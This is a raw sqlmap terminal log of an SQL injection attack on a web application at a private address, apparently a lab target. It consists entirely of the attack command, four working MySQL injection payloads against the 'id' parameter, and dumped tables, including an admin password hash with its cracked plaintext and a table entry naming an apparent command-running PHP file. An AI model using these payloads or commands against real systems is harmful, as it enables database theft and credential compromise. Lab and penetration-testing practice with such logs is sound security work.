sqlmap -u http://192.168.1.92/cat.php?id=1 -D photoblog --dump-all --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:12:11 /2020-04-17/

[07:12:11] [INFO] resuming back-end DBMS 'mysql' 
[07:12:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7156=7156

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 8728 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(8728=8728,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8358 FROM (SELECT(SLEEP(5)))CUaH)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x5378794e7872654d5174614c4c57666e444e6a5262574e4a4d515a51615949666e7a655950657262,0x716b707a71),NULL,NULL-- -
---
[07:12:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[07:12:11] [INFO] fetching tables for database: 'photoblog'
[07:12:11] [INFO] fetching columns for table 'users' in database 'photoblog'
[07:12:11] [INFO] fetching entries for table 'users' in database 'photoblog'
[07:12:11] [INFO] recognized possible password hashes in column '`password`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[07:12:11] [INFO] using hash method 'md5_generic_passwd'
[07:12:11] [INFO] resuming password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2' for user 'admin'
Database: photoblog
Table: users
[1 entry]
+------+-------+---------------------------------------------+
| id   | login | password                                    |
+------+-------+---------------------------------------------+
| 1    | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+------+-------+---------------------------------------------+

[07:12:11] [INFO] table 'photoblog.users' dumped to CSV file '/home/funksh0n/.sqlmap/output/192.168.1.92/dump/photoblog/users.csv'
[07:12:11] [INFO] fetching columns for table 'pictures' in database 'photoblog'
[07:12:11] [INFO] fetching entries for table 'pictures' in database 'photoblog'
Database: photoblog
Table: pictures
[4 entries]
+-----+-----------------+------+---------+
| cat | img             | id   | title   |
+-----+-----------------+------+---------+
| 2   | hacker.png      | 1    | Hacker  |
| 1   | ruby.jpg        | 2    | Ruby    |
| 1   | cthulhu.png     | 3    | Cthulhu |
| 1   | runcommand.php3 | 5    | run     |
+-----+-----------------+------+---------+

[07:12:11] [INFO] table 'photoblog.pictures' dumped to CSV file '/home/funksh0n/.sqlmap/output/192.168.1.92/dump/photoblog/pictures.csv'
[07:12:11] [INFO] fetching columns for table 'categories' in database 'photoblog'
[07:12:11] [INFO] fetching entries for table 'categories' in database 'photoblog'
Database: photoblog
Table: categories
[3 entries]
+------+--------+
| id   | title  |
+------+--------+
| 1    | test   |
| 2    | ruxcon |
| 3    | 2010   |
+------+--------+

[07:12:11] [INFO] table 'photoblog.categories' dumped to CSV file '/home/funksh0n/.sqlmap/output/192.168.1.92/dump/photoblog/categories.csv'
[07:12:11] [INFO] fetched data logged to text files under '/home/funksh0n/.sqlmap/output/192.168.1.92'

[*] ending @ 07:12:11 /2020-04-17/

